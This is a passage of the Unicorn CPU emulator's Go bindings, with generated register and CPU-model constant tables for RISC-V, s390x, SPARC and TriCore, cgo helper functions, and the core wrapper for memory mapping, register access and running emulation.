RISCV_REG_HPMCOUNTER29 = 73 RISCV_REG_HPMCOUNTER30 = 74 RISCV_REG_HPMCOUNTER31 = 75 RISCV_REG_CYCLEH = 76 RISCV_REG_TIMEH = 77 RISCV_REG_INSTRETH = 78 RISCV_REG_HPMCOUNTER3H = 79 RISCV_REG_HPMCOUNTER4H = 80 RISCV_REG_HPMCOUNTER5H = 81 RISCV_REG_HPMCOUNTER6H = 82 RISCV_REG_HPMCOUNTER7H = 83 RISCV_REG_HPMCOUNTER8H = 84 RISCV_REG_HPMCOUNTER9H = 85 RISCV_REG_HPMCOUNTER10H = 86 RISCV_REG_HPMCOUNTER11H = 87 RISCV_REG_HPMCOUNTER12H = 88 RISCV_REG_HPMCOUNTER13H = 89 RISCV_REG_HPMCOUNTER14H = 90 RISCV_REG_HPMCOUNTER15H = 91 RISCV_REG_HPMCOUNTER16H = 92 RISCV_REG_HPMCOUNTER17H = 93 RISCV_REG_HPMCOUNTER18H = 94 RISCV_REG_HPMCOUNTER19H = 95 RISCV_REG_HPMCOUNTER20H = 96 RISCV_REG_HPMCOUNTER21H = 97 RISCV_REG_HPMCOUNTER22H = 98 RISCV_REG_HPMCOUNTER23H = 99 RISCV_REG_HPMCOUNTER24H = 100 RISCV_REG_HPMCOUNTER25H = 101 RISCV_REG_HPMCOUNTER26H = 102 RISCV_REG_HPMCOUNTER27H = 103 RISCV_REG_HPMCOUNTER28H = 104 RISCV_REG_HPMCOUNTER29H = 105 RISCV_REG_HPMCOUNTER30H = 106 RISCV_REG_HPMCOUNTER31H = 107 RISCV_REG_MCYCLE = 108 RISCV_REG_MINSTRET = 109 RISCV_REG_MCYCLEH = 110 RISCV_REG_MINSTRETH = 111 RISCV_REG_MVENDORID = 112 RISCV_REG_MARCHID = 113 RISCV_REG_MIMPID = 114 RISCV_REG_MHARTID = 115 RISCV_REG_MSTATUS = 116 RISCV_REG_MISA = 117 RISCV_REG_MEDELEG = 118 RISCV_REG_MIDELEG = 119 RISCV_REG_MIE = 120 RISCV_REG_MTVEC = 121 RISCV_REG_MCOUNTEREN = 122 RISCV_REG_MSTATUSH = 123 RISCV_REG_MUCOUNTEREN = 124 RISCV_REG_MSCOUNTEREN = 125 RISCV_REG_MHCOUNTEREN = 126 RISCV_REG_MSCRATCH = 127 RISCV_REG_MEPC = 128 RISCV_REG_MCAUSE = 129 
RISCV_REG_MTVAL = 130 RISCV_REG_MIP = 131 RISCV_REG_MBADADDR = 132 RISCV_REG_SSTATUS = 133 RISCV_REG_SEDELEG = 134 RISCV_REG_SIDELEG = 135 RISCV_REG_SIE = 136 RISCV_REG_STVEC = 137 RISCV_REG_SCOUNTEREN = 138 RISCV_REG_SSCRATCH = 139 RISCV_REG_SEPC = 140 RISCV_REG_SCAUSE = 141 RISCV_REG_STVAL = 142 RISCV_REG_SIP = 143 RISCV_REG_SBADADDR = 144 RISCV_REG_SPTBR = 145 RISCV_REG_SATP = 146 RISCV_REG_HSTATUS = 147 RISCV_REG_HEDELEG = 148 RISCV_REG_HIDELEG = 149 RISCV_REG_HIE = 150 RISCV_REG_HCOUNTEREN = 151 RISCV_REG_HTVAL = 152 RISCV_REG_HIP = 153 RISCV_REG_HTINST = 154 RISCV_REG_HGATP = 155 RISCV_REG_HTIMEDELTA = 156 RISCV_REG_HTIMEDELTAH = 157 // Floating-point registers RISCV_REG_F0 = 158 RISCV_REG_F1 = 159 RISCV_REG_F2 = 160 RISCV_REG_F3 = 161 RISCV_REG_F4 = 162 RISCV_REG_F5 = 163 RISCV_REG_F6 = 164 RISCV_REG_F7 = 165 RISCV_REG_F8 = 166 RISCV_REG_F9 = 167 RISCV_REG_F10 = 168 RISCV_REG_F11 = 169 RISCV_REG_F12 = 170 RISCV_REG_F13 = 171 RISCV_REG_F14 = 172 RISCV_REG_F15 = 173 RISCV_REG_F16 = 174 RISCV_REG_F17 = 175 RISCV_REG_F18 = 176 RISCV_REG_F19 = 177 RISCV_REG_F20 = 178 RISCV_REG_F21 = 179 RISCV_REG_F22 = 180 RISCV_REG_F23 = 181 RISCV_REG_F24 = 182 RISCV_REG_F25 = 183 RISCV_REG_F26 = 184 RISCV_REG_F27 = 185 RISCV_REG_F28 = 186 RISCV_REG_F29 = 187 RISCV_REG_F30 = 188 RISCV_REG_F31 = 189 RISCV_REG_PC = 190 RISCV_REG_ENDING = 191 // Alias registers RISCV_REG_ZERO = 1 RISCV_REG_RA = 2 RISCV_REG_SP = 3 RISCV_REG_GP = 4 RISCV_REG_TP = 5 RISCV_REG_T0 = 6 RISCV_REG_T1 = 7 RISCV_REG_T2 = 8 RISCV_REG_S0 = 9 RISCV_REG_FP = 9 RISCV_REG_S1 = 10 RISCV_REG_A0 = 11 RISCV_REG_A1 = 12 RISCV_REG_A2 = 13 RISCV_REG_A3 = 14 RISCV_REG_A4 = 15 RISCV_REG_A5 = 16 RISCV_REG_A6 = 17 RISCV_REG_A7 = 18 RISCV_REG_S2 = 19 RISCV_REG_S3 = 20 RISCV_REG_S4 = 21 RISCV_REG_S5 = 22 RISCV_REG_S6 = 23 RISCV_REG_S7 = 24 RISCV_REG_S8 = 25 RISCV_REG_S9 = 26 RISCV_REG_S10 = 27 RISCV_REG_S11 = 28 RISCV_REG_T3 = 29 RISCV_REG_T4 = 30 RISCV_REG_T5 = 31 RISCV_REG_T6 = 32 RISCV_REG_FT0 = 158 RISCV_REG_FT1 = 159 RISCV_REG_FT2 = 160 RISCV_REG_FT3 = 161 RISCV_REG_FT4 = 162 RISCV_REG_FT5 = 163 RISCV_REG_FT6 = 164 RISCV_REG_FT7 = 165 RISCV_REG_FS0 = 166 RISCV_REG_FS1 = 167 RISCV_REG_FA0 = 168 RISCV_REG_FA1 = 169 RISCV_REG_FA2 = 170 RISCV_REG_FA3 = 171 RISCV_REG_FA4 = 172 RISCV_REG_FA5 = 173 RISCV_REG_FA6 = 174 RISCV_REG_FA7 = 175 RISCV_REG_FS2 = 176 RISCV_REG_FS3 = 177 RISCV_REG_FS4 = 178 RISCV_REG_FS5 = 179 RISCV_REG_FS6 = 180 RISCV_REG_FS7 = 181 RISCV_REG_FS8 = 182 RISCV_REG_FS9 = 183 RISCV_REG_FS10 = 184 RISCV_REG_FS11 = 185 RISCV_REG_FT8 = 186 RISCV_REG_FT9 = 187 RISCV_REG_FT10 = 188 RISCV_REG_FT11 = 189 )unicorn-2.1.1/bindings/go/unicorn/s390x_const.go000066400000000000000000000045611467524106700215140ustar00rootroot00000000000000package unicorn // For Unicorn Engine. 
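// Editor's example -- a hedged sketch, not upstream code: pick a concrete
// RISC-V core from the table above and read a register through its ABI alias.
// Setting the CPU model before any emulation starts reflects typical use and
// is an assumption of this sketch.
func riscvReturnValue() (uint64, error) {
	mu, err := NewUnicorn(ARCH_RISCV, MODE_RISCV64)
	if err != nil {
		return 0, err
	}
	defer mu.Close()
	if err := mu.SetCPUModel(CPU_RISCV64_SIFIVE_U54); err != nil {
		return 0, err
	}
	// RISCV_REG_A0 (11) aliases RISCV_REG_X10, the integer return register.
	return mu.RegRead(RISCV_REG_A0)
}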
AUTO-GENERATED FILE, DO NOT EDIT [s390x_const.go] const ( // S390X CPU CPU_S390X_Z900 = 0 CPU_S390X_Z900_2 = 1 CPU_S390X_Z900_3 = 2 CPU_S390X_Z800 = 3 CPU_S390X_Z990 = 4 CPU_S390X_Z990_2 = 5 CPU_S390X_Z990_3 = 6 CPU_S390X_Z890 = 7 CPU_S390X_Z990_4 = 8 CPU_S390X_Z890_2 = 9 CPU_S390X_Z990_5 = 10 CPU_S390X_Z890_3 = 11 CPU_S390X_Z9EC = 12 CPU_S390X_Z9EC_2 = 13 CPU_S390X_Z9BC = 14 CPU_S390X_Z9EC_3 = 15 CPU_S390X_Z9BC_2 = 16 CPU_S390X_Z10EC = 17 CPU_S390X_Z10EC_2 = 18 CPU_S390X_Z10BC = 19 CPU_S390X_Z10EC_3 = 20 CPU_S390X_Z10BC_2 = 21 CPU_S390X_Z196 = 22 CPU_S390X_Z196_2 = 23 CPU_S390X_Z114 = 24 CPU_S390X_ZEC12 = 25 CPU_S390X_ZEC12_2 = 26 CPU_S390X_ZBC12 = 27 CPU_S390X_Z13 = 28 CPU_S390X_Z13_2 = 29 CPU_S390X_Z13S = 30 CPU_S390X_Z14 = 31 CPU_S390X_Z14_2 = 32 CPU_S390X_Z14ZR1 = 33 CPU_S390X_GEN15A = 34 CPU_S390X_GEN15B = 35 CPU_S390X_QEMU = 36 CPU_S390X_MAX = 37 CPU_S390X_ENDING = 38 // S390X registers S390X_REG_INVALID = 0 // General purpose registers S390X_REG_R0 = 1 S390X_REG_R1 = 2 S390X_REG_R2 = 3 S390X_REG_R3 = 4 S390X_REG_R4 = 5 S390X_REG_R5 = 6 S390X_REG_R6 = 7 S390X_REG_R7 = 8 S390X_REG_R8 = 9 S390X_REG_R9 = 10 S390X_REG_R10 = 11 S390X_REG_R11 = 12 S390X_REG_R12 = 13 S390X_REG_R13 = 14 S390X_REG_R14 = 15 S390X_REG_R15 = 16 // Floating point registers S390X_REG_F0 = 17 S390X_REG_F1 = 18 S390X_REG_F2 = 19 S390X_REG_F3 = 20 S390X_REG_F4 = 21 S390X_REG_F5 = 22 S390X_REG_F6 = 23 S390X_REG_F7 = 24 S390X_REG_F8 = 25 S390X_REG_F9 = 26 S390X_REG_F10 = 27 S390X_REG_F11 = 28 S390X_REG_F12 = 29 S390X_REG_F13 = 30 S390X_REG_F14 = 31 S390X_REG_F15 = 32 S390X_REG_F16 = 33 S390X_REG_F17 = 34 S390X_REG_F18 = 35 S390X_REG_F19 = 36 S390X_REG_F20 = 37 S390X_REG_F21 = 38 S390X_REG_F22 = 39 S390X_REG_F23 = 40 S390X_REG_F24 = 41 S390X_REG_F25 = 42 S390X_REG_F26 = 43 S390X_REG_F27 = 44 S390X_REG_F28 = 45 S390X_REG_F29 = 46 S390X_REG_F30 = 47 S390X_REG_F31 = 48 // Access registers S390X_REG_A0 = 49 S390X_REG_A1 = 50 S390X_REG_A2 = 51 S390X_REG_A3 = 52 S390X_REG_A4 = 53 S390X_REG_A5 = 54 S390X_REG_A6 = 55 S390X_REG_A7 = 56 S390X_REG_A8 = 57 S390X_REG_A9 = 58 S390X_REG_A10 = 59 S390X_REG_A11 = 60 S390X_REG_A12 = 61 S390X_REG_A13 = 62 S390X_REG_A14 = 63 S390X_REG_A15 = 64 S390X_REG_PC = 65 S390X_REG_PSWM = 66 S390X_REG_ENDING = 67 // Alias registers )unicorn-2.1.1/bindings/go/unicorn/sparc_const.go000066400000000000000000000056751467524106700217450ustar00rootroot00000000000000package unicorn // For Unicorn Engine. 
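// Editor's note: every generated table above ends with an *_ENDING sentinel
// one past the last valid id, so range checks need no hand-maintained
// maximum. A hypothetical helper (not part of the bindings):
func isValidS390xReg(reg int) bool {
	return reg > S390X_REG_INVALID && reg < S390X_REG_ENDING
}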
AUTO-GENERATED FILE, DO NOT EDIT [sparc_const.go] const ( // SPARC32 CPU CPU_SPARC32_FUJITSU_MB86904 = 0 CPU_SPARC32_FUJITSU_MB86907 = 1 CPU_SPARC32_TI_MICROSPARC_I = 2 CPU_SPARC32_TI_MICROSPARC_II = 3 CPU_SPARC32_TI_MICROSPARC_IIEP = 4 CPU_SPARC32_TI_SUPERSPARC_40 = 5 CPU_SPARC32_TI_SUPERSPARC_50 = 6 CPU_SPARC32_TI_SUPERSPARC_51 = 7 CPU_SPARC32_TI_SUPERSPARC_60 = 8 CPU_SPARC32_TI_SUPERSPARC_61 = 9 CPU_SPARC32_TI_SUPERSPARC_II = 10 CPU_SPARC32_LEON2 = 11 CPU_SPARC32_LEON3 = 12 CPU_SPARC32_ENDING = 13 // SPARC64 CPU CPU_SPARC64_FUJITSU = 0 CPU_SPARC64_FUJITSU_III = 1 CPU_SPARC64_FUJITSU_IV = 2 CPU_SPARC64_FUJITSU_V = 3 CPU_SPARC64_TI_ULTRASPARC_I = 4 CPU_SPARC64_TI_ULTRASPARC_II = 5 CPU_SPARC64_TI_ULTRASPARC_III = 6 CPU_SPARC64_TI_ULTRASPARC_IIE = 7 CPU_SPARC64_SUN_ULTRASPARC_III = 8 CPU_SPARC64_SUN_ULTRASPARC_III_CU = 9 CPU_SPARC64_SUN_ULTRASPARC_IIII = 10 CPU_SPARC64_SUN_ULTRASPARC_IV = 11 CPU_SPARC64_SUN_ULTRASPARC_IV_PLUS = 12 CPU_SPARC64_SUN_ULTRASPARC_IIII_PLUS = 13 CPU_SPARC64_SUN_ULTRASPARC_T1 = 14 CPU_SPARC64_SUN_ULTRASPARC_T2 = 15 CPU_SPARC64_NEC_ULTRASPARC_I = 16 CPU_SPARC64_ENDING = 17 // SPARC registers SPARC_REG_INVALID = 0 SPARC_REG_F0 = 1 SPARC_REG_F1 = 2 SPARC_REG_F2 = 3 SPARC_REG_F3 = 4 SPARC_REG_F4 = 5 SPARC_REG_F5 = 6 SPARC_REG_F6 = 7 SPARC_REG_F7 = 8 SPARC_REG_F8 = 9 SPARC_REG_F9 = 10 SPARC_REG_F10 = 11 SPARC_REG_F11 = 12 SPARC_REG_F12 = 13 SPARC_REG_F13 = 14 SPARC_REG_F14 = 15 SPARC_REG_F15 = 16 SPARC_REG_F16 = 17 SPARC_REG_F17 = 18 SPARC_REG_F18 = 19 SPARC_REG_F19 = 20 SPARC_REG_F20 = 21 SPARC_REG_F21 = 22 SPARC_REG_F22 = 23 SPARC_REG_F23 = 24 SPARC_REG_F24 = 25 SPARC_REG_F25 = 26 SPARC_REG_F26 = 27 SPARC_REG_F27 = 28 SPARC_REG_F28 = 29 SPARC_REG_F29 = 30 SPARC_REG_F30 = 31 SPARC_REG_F31 = 32 SPARC_REG_F32 = 33 SPARC_REG_F34 = 34 SPARC_REG_F36 = 35 SPARC_REG_F38 = 36 SPARC_REG_F40 = 37 SPARC_REG_F42 = 38 SPARC_REG_F44 = 39 SPARC_REG_F46 = 40 SPARC_REG_F48 = 41 SPARC_REG_F50 = 42 SPARC_REG_F52 = 43 SPARC_REG_F54 = 44 SPARC_REG_F56 = 45 SPARC_REG_F58 = 46 SPARC_REG_F60 = 47 SPARC_REG_F62 = 48 SPARC_REG_FCC0 = 49 SPARC_REG_FCC1 = 50 SPARC_REG_FCC2 = 51 SPARC_REG_FCC3 = 52 SPARC_REG_G0 = 53 SPARC_REG_G1 = 54 SPARC_REG_G2 = 55 SPARC_REG_G3 = 56 SPARC_REG_G4 = 57 SPARC_REG_G5 = 58 SPARC_REG_G6 = 59 SPARC_REG_G7 = 60 SPARC_REG_I0 = 61 SPARC_REG_I1 = 62 SPARC_REG_I2 = 63 SPARC_REG_I3 = 64 SPARC_REG_I4 = 65 SPARC_REG_I5 = 66 SPARC_REG_FP = 67 SPARC_REG_I7 = 68 SPARC_REG_ICC = 69 SPARC_REG_L0 = 70 SPARC_REG_L1 = 71 SPARC_REG_L2 = 72 SPARC_REG_L3 = 73 SPARC_REG_L4 = 74 SPARC_REG_L5 = 75 SPARC_REG_L6 = 76 SPARC_REG_L7 = 77 SPARC_REG_O0 = 78 SPARC_REG_O1 = 79 SPARC_REG_O2 = 80 SPARC_REG_O3 = 81 SPARC_REG_O4 = 82 SPARC_REG_O5 = 83 SPARC_REG_SP = 84 SPARC_REG_O7 = 85 SPARC_REG_Y = 86 SPARC_REG_XCC = 87 SPARC_REG_PC = 88 SPARC_REG_ENDING = 89 SPARC_REG_O6 = 84 SPARC_REG_I6 = 67 )unicorn-2.1.1/bindings/go/unicorn/tricore_const.go000066400000000000000000000054651467524106700223010ustar00rootroot00000000000000package unicorn // For Unicorn Engine. 
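// Editor's example -- hypothetical helper, not upstream: in the SPARC table
// above the window names and role names overlap (SPARC_REG_O6 = SPARC_REG_SP
// = 84 and SPARC_REG_I6 = SPARC_REG_FP = 67), so either constant addresses
// the same underlying register.
func sparcStackAndFrame(mu Unicorn) (sp, fp uint64, err error) {
	if sp, err = mu.RegRead(SPARC_REG_O6); err != nil { // same as SPARC_REG_SP
		return
	}
	fp, err = mu.RegRead(SPARC_REG_I6) // same as SPARC_REG_FP
	return
}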
AUTO-GENERATED FILE, DO NOT EDIT [tricore_const.go] const ( // TRICORE CPU CPU_TRICORE_TC1796 = 0 CPU_TRICORE_TC1797 = 1 CPU_TRICORE_TC27X = 2 CPU_TRICORE_ENDING = 3 // TRICORE registers TRICORE_REG_INVALID = 0 TRICORE_REG_A0 = 1 TRICORE_REG_A1 = 2 TRICORE_REG_A2 = 3 TRICORE_REG_A3 = 4 TRICORE_REG_A4 = 5 TRICORE_REG_A5 = 6 TRICORE_REG_A6 = 7 TRICORE_REG_A7 = 8 TRICORE_REG_A8 = 9 TRICORE_REG_A9 = 10 TRICORE_REG_A10 = 11 TRICORE_REG_A11 = 12 TRICORE_REG_A12 = 13 TRICORE_REG_A13 = 14 TRICORE_REG_A14 = 15 TRICORE_REG_A15 = 16 TRICORE_REG_D0 = 17 TRICORE_REG_D1 = 18 TRICORE_REG_D2 = 19 TRICORE_REG_D3 = 20 TRICORE_REG_D4 = 21 TRICORE_REG_D5 = 22 TRICORE_REG_D6 = 23 TRICORE_REG_D7 = 24 TRICORE_REG_D8 = 25 TRICORE_REG_D9 = 26 TRICORE_REG_D10 = 27 TRICORE_REG_D11 = 28 TRICORE_REG_D12 = 29 TRICORE_REG_D13 = 30 TRICORE_REG_D14 = 31 TRICORE_REG_D15 = 32 TRICORE_REG_PCXI = 33 TRICORE_REG_PSW = 34 TRICORE_REG_PSW_USB_C = 35 TRICORE_REG_PSW_USB_V = 36 TRICORE_REG_PSW_USB_SV = 37 TRICORE_REG_PSW_USB_AV = 38 TRICORE_REG_PSW_USB_SAV = 39 TRICORE_REG_PC = 40 TRICORE_REG_SYSCON = 41 TRICORE_REG_CPU_ID = 42 TRICORE_REG_BIV = 43 TRICORE_REG_BTV = 44 TRICORE_REG_ISP = 45 TRICORE_REG_ICR = 46 TRICORE_REG_FCX = 47 TRICORE_REG_LCX = 48 TRICORE_REG_COMPAT = 49 TRICORE_REG_DPR0_U = 50 TRICORE_REG_DPR1_U = 51 TRICORE_REG_DPR2_U = 52 TRICORE_REG_DPR3_U = 53 TRICORE_REG_DPR0_L = 54 TRICORE_REG_DPR1_L = 55 TRICORE_REG_DPR2_L = 56 TRICORE_REG_DPR3_L = 57 TRICORE_REG_CPR0_U = 58 TRICORE_REG_CPR1_U = 59 TRICORE_REG_CPR2_U = 60 TRICORE_REG_CPR3_U = 61 TRICORE_REG_CPR0_L = 62 TRICORE_REG_CPR1_L = 63 TRICORE_REG_CPR2_L = 64 TRICORE_REG_CPR3_L = 65 TRICORE_REG_DPM0 = 66 TRICORE_REG_DPM1 = 67 TRICORE_REG_DPM2 = 68 TRICORE_REG_DPM3 = 69 TRICORE_REG_CPM0 = 70 TRICORE_REG_CPM1 = 71 TRICORE_REG_CPM2 = 72 TRICORE_REG_CPM3 = 73 TRICORE_REG_MMU_CON = 74 TRICORE_REG_MMU_ASI = 75 TRICORE_REG_MMU_TVA = 76 TRICORE_REG_MMU_TPA = 77 TRICORE_REG_MMU_TPX = 78 TRICORE_REG_MMU_TFA = 79 TRICORE_REG_BMACON = 80 TRICORE_REG_SMACON = 81 TRICORE_REG_DIEAR = 82 TRICORE_REG_DIETR = 83 TRICORE_REG_CCDIER = 84 TRICORE_REG_MIECON = 85 TRICORE_REG_PIEAR = 86 TRICORE_REG_PIETR = 87 TRICORE_REG_CCPIER = 88 TRICORE_REG_DBGSR = 89 TRICORE_REG_EXEVT = 90 TRICORE_REG_CREVT = 91 TRICORE_REG_SWEVT = 92 TRICORE_REG_TR0EVT = 93 TRICORE_REG_TR1EVT = 94 TRICORE_REG_DMS = 95 TRICORE_REG_DCX = 96 TRICORE_REG_DBGTCR = 97 TRICORE_REG_CCTRL = 98 TRICORE_REG_CCNT = 99 TRICORE_REG_ICNT = 100 TRICORE_REG_M1CNT = 101 TRICORE_REG_M2CNT = 102 TRICORE_REG_M3CNT = 103 TRICORE_REG_ENDING = 104 TRICORE_REG_GA0 = 1 TRICORE_REG_GA1 = 2 TRICORE_REG_GA8 = 9 TRICORE_REG_GA9 = 10 TRICORE_REG_SP = 11 TRICORE_REG_LR = 12 TRICORE_REG_IA = 16 TRICORE_REG_ID = 32 )unicorn-2.1.1/bindings/go/unicorn/uc.c000066400000000000000000000015771467524106700176500ustar00rootroot00000000000000#include #include #include "_cgo_export.h" uc_err uc_reg_read_batch_helper(uc_engine *handle, int *regs, uint64_t *val_out, int count) { void **val_ref = malloc(sizeof(void *) * count); int i; for (i = 0; i < count; i++) { val_ref[i] = (void *)&val_out[i]; } uc_err ret = uc_reg_read_batch(handle, regs, val_ref, count); free(val_ref); return ret; } uc_err uc_reg_write_batch_helper(uc_engine *handle, int *regs, uint64_t *val_in, int count) { void **val_ref = malloc(sizeof(void *) * count); int i; for (i = 0; i < count; i++) { val_ref[i] = (void *)&val_in[i]; } uc_err ret = uc_reg_write_batch(handle, regs, (void *const *)val_ref, count); free(val_ref); return ret; } uc_err uc_ctl_set_cpu_model_helper(uc_engine *handle, 
int model) { return uc_ctl_set_cpu_model(handle, model); }
unicorn-2.1.1/bindings/go/unicorn/uc.h000066400000000000000000000003741467524106700176470ustar00rootroot00000000000000uc_err uc_reg_read_batch_helper(uc_engine *handle, int *regs, uint64_t *val_out, int count);
uc_err uc_reg_write_batch_helper(uc_engine *handle, int *regs, uint64_t *val_in, int count);
uc_err uc_ctl_set_cpu_model_helper(uc_engine *handle, int model);
unicorn-2.1.1/bindings/go/unicorn/unicorn.go000066400000000000000000000145261467524106700210770ustar00rootroot00000000000000package unicorn

import (
	"runtime"
	"sync"
	"unsafe"
)

/*
#cgo CFLAGS: -O3 -Wall -Werror -I../../../include
#cgo LDFLAGS: -L../../../ -lunicorn -Wl,-rpath,${SRCDIR}/../../../
#cgo linux LDFLAGS: -L../../../ -lunicorn -lrt -Wl,-rpath,${SRCDIR}/../../../
#include <unicorn/unicorn.h>
#include "uc.h"
*/
import "C"

type UcError C.uc_err

func (u UcError) Error() string {
	return C.GoString(C.uc_strerror(C.uc_err(u)))
}

func errReturn(err C.uc_err) error {
	if err != ERR_OK {
		return UcError(err)
	}
	return nil
}

type MemRegion struct {
	Begin, End uint64
	Prot       int
}

type Unicorn interface {
	MemMap(addr, size uint64) error
	MemMapProt(addr, size uint64, prot int) error
	MemMapPtr(addr, size uint64, prot int, ptr unsafe.Pointer) error
	MemProtect(addr, size uint64, prot int) error
	MemUnmap(addr, size uint64) error
	MemRegions() ([]*MemRegion, error)
	MemRead(addr, size uint64) ([]byte, error)
	MemReadInto(dst []byte, addr uint64) error
	MemWrite(addr uint64, data []byte) error
	RegRead(reg int) (uint64, error)
	RegReadBatch(regs []int) ([]uint64, error)
	RegWrite(reg int, value uint64) error
	RegWriteBatch(regs []int, vals []uint64) error
	RegReadMmr(reg int) (*X86Mmr, error)
	RegWriteMmr(reg int, value *X86Mmr) error
	Start(begin, until uint64) error
	StartWithOptions(begin, until uint64, options *UcOptions) error
	Stop() error
	HookAdd(htype int, cb interface{}, begin, end uint64, extra ...int) (Hook, error)
	HookDel(hook Hook) error
	Query(queryType int) (uint64, error)
	Close() error
	ContextSave(reuse Context) (Context, error)
	ContextRestore(Context) error
	Handle() *C.uc_engine
	RegWriteX86Msr(reg uint64, val uint64) error
	RegReadX86Msr(reg uint64) (uint64, error)
	SetCPUModel(model int) error
}

type uc struct {
	handle *C.uc_engine
	final  sync.Once
	hooks  map[Hook]uintptr
}

type UcOptions struct {
	Timeout, Count uint64
}

func Version() (int, int) {
	var major, minor C.uint
	C.uc_version(&major, &minor)
	return int(major), int(minor)
}

func NewUnicorn(arch, mode int) (Unicorn, error) {
	major, minor := Version()
	if major != C.UC_API_MAJOR || minor != C.UC_API_MINOR {
		return nil, UcError(ERR_VERSION)
	}
	var handle *C.uc_engine
	if ucerr := C.uc_open(C.uc_arch(arch), C.uc_mode(mode), &handle); ucerr != ERR_OK {
		return nil, UcError(ucerr)
	}
	u := &uc{handle: handle, hooks: make(map[Hook]uintptr)}
	runtime.SetFinalizer(u, func(u *uc) { u.Close() })
	return u, nil
}

func (u *uc) Close() (err error) {
	u.final.Do(func() {
		if u.handle != nil {
			for _, uptr := range u.hooks {
				hookMap.remove(uptr)
			}
			u.hooks = nil
			err = errReturn(C.uc_close(u.handle))
			u.handle = nil
		}
	})
	return err
}

func (u *uc) StartWithOptions(begin, until uint64, options *UcOptions) error {
	ucerr := C.uc_emu_start(u.handle, C.uint64_t(begin), C.uint64_t(until), C.uint64_t(options.Timeout), C.size_t(options.Count))
	return errReturn(ucerr)
}

func (u *uc) Start(begin, until uint64) error {
	return u.StartWithOptions(begin, until, &UcOptions{})
}

func (u *uc) Stop() error {
	return errReturn(C.uc_emu_stop(u.handle))
}

func (u *uc) RegWrite(reg int, value
uint64) error {
	var val C.uint64_t = C.uint64_t(value)
	ucerr := C.uc_reg_write(u.handle, C.int(reg), unsafe.Pointer(&val))
	return errReturn(ucerr)
}

func (u *uc) RegRead(reg int) (uint64, error) {
	var val C.uint64_t
	ucerr := C.uc_reg_read(u.handle, C.int(reg), unsafe.Pointer(&val))
	return uint64(val), errReturn(ucerr)
}

func (u *uc) RegWriteBatch(regs []int, vals []uint64) error {
	if len(regs) == 0 {
		return nil
	}
	if len(vals) < len(regs) {
		regs = regs[:len(vals)]
	}
	cregs := make([]C.int, len(regs))
	for i, v := range regs {
		cregs[i] = C.int(v)
	}
	cregs2 := (*C.int)(unsafe.Pointer(&cregs[0]))
	cvals := (*C.uint64_t)(unsafe.Pointer(&vals[0]))
	ucerr := C.uc_reg_write_batch_helper(u.handle, cregs2, cvals, C.int(len(regs)))
	return errReturn(ucerr)
}

func (u *uc) RegReadBatch(regs []int) ([]uint64, error) {
	if len(regs) == 0 {
		return nil, nil
	}
	cregs := make([]C.int, len(regs))
	for i, v := range regs {
		cregs[i] = C.int(v)
	}
	cregs2 := (*C.int)(unsafe.Pointer(&cregs[0]))
	vals := make([]uint64, len(regs))
	cvals := (*C.uint64_t)(unsafe.Pointer(&vals[0]))
	ucerr := C.uc_reg_read_batch_helper(u.handle, cregs2, cvals, C.int(len(regs)))
	return vals, errReturn(ucerr)
}

func (u *uc) MemRegions() ([]*MemRegion, error) {
	var regions *C.uc_mem_region
	var count C.uint32_t
	ucerr := C.uc_mem_regions(u.handle, &regions, &count)
	if ucerr != C.UC_ERR_OK {
		return nil, errReturn(ucerr)
	}
	ret := make([]*MemRegion, count)
	tmp := (*[1 << 24]C.struct_uc_mem_region)(unsafe.Pointer(regions))[:count]
	for i, v := range tmp {
		ret[i] = &MemRegion{
			Begin: uint64(v.begin),
			End:   uint64(v.end),
			Prot:  int(v.perms),
		}
	}
	C.uc_free(unsafe.Pointer(regions))
	return ret, nil
}

func (u *uc) MemWrite(addr uint64, data []byte) error {
	if len(data) == 0 {
		return nil
	}
	return errReturn(C.uc_mem_write(u.handle, C.uint64_t(addr), unsafe.Pointer(&data[0]), C.size_t(len(data))))
}

func (u *uc) MemReadInto(dst []byte, addr uint64) error {
	if len(dst) == 0 {
		return nil
	}
	return errReturn(C.uc_mem_read(u.handle, C.uint64_t(addr), unsafe.Pointer(&dst[0]), C.size_t(len(dst))))
}

func (u *uc) MemRead(addr, size uint64) ([]byte, error) {
	dst := make([]byte, size)
	return dst, u.MemReadInto(dst, addr)
}

func (u *uc) MemMapProt(addr, size uint64, prot int) error {
	return errReturn(C.uc_mem_map(u.handle, C.uint64_t(addr), C.size_t(size), C.uint32_t(prot)))
}

func (u *uc) MemMap(addr, size uint64) error {
	return u.MemMapProt(addr, size, PROT_ALL)
}

func (u *uc) MemMapPtr(addr, size uint64, prot int, ptr unsafe.Pointer) error {
	return errReturn(C.uc_mem_map_ptr(u.handle, C.uint64_t(addr), C.size_t(size), C.uint32_t(prot), ptr))
}

func (u *uc) MemProtect(addr, size uint64, prot int) error {
	return errReturn(C.uc_mem_protect(u.handle, C.uint64_t(addr), C.size_t(size), C.uint32_t(prot)))
}

func (u *uc) MemUnmap(addr, size uint64) error {
	return errReturn(C.uc_mem_unmap(u.handle, C.uint64_t(addr), C.size_t(size)))
}

func (u *uc) Query(queryType int) (uint64, error) {
	var ret C.size_t
	ucerr := C.uc_query(u.handle, C.uc_query_type(queryType), &ret)
	return uint64(ret), errReturn(ucerr)
}

func (u *uc) Handle() *C.uc_engine {
	return u.handle
}

func (u *uc) SetCPUModel(model int) error {
	ucerr := C.uc_ctl_set_cpu_model_helper(u.handle, C.int(model))
	return errReturn(ucerr)
}
unicorn-2.1.1/bindings/go/unicorn/unicorn_const.go000066400000000000000000000054511467524106700223020ustar00rootroot00000000000000package unicorn
// For Unicorn Engine.
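// Editor's example -- a hedged, minimal end-to-end sketch of the API
// implemented above, not upstream code: map a page, write two x86 "inc ecx"
// instructions, trace execution with a code hook, run, and read the result.
// The ARCH_/MODE_/HOOK_ constants are defined in unicorn_const.go just below;
// the callback shape assumes the bindings' usual HOOK_CODE convention, and the
// addresses and machine code are made up for illustration.
func exampleIncEcx() (uint64, error) {
	mu, err := NewUnicorn(ARCH_X86, MODE_32)
	if err != nil {
		return 0, err
	}
	defer mu.Close()
	code := []byte{0x41, 0x41} // inc ecx; inc ecx
	if err := mu.MemMap(0x1000, 0x1000); err != nil { // PROT_ALL by default
		return 0, err
	}
	if err := mu.MemWrite(0x1000, code); err != nil {
		return 0, err
	}
	if _, err := mu.HookAdd(HOOK_CODE, func(mu Unicorn, addr uint64, size uint32) {
		// invoked once per emulated instruction in [0x1000, 0x2000]
	}, 0x1000, 0x2000); err != nil {
		return 0, err
	}
	if err := mu.RegWrite(X86_REG_ECX, 5); err != nil {
		return 0, err
	}
	if err := mu.Start(0x1000, 0x1000+uint64(len(code))); err != nil {
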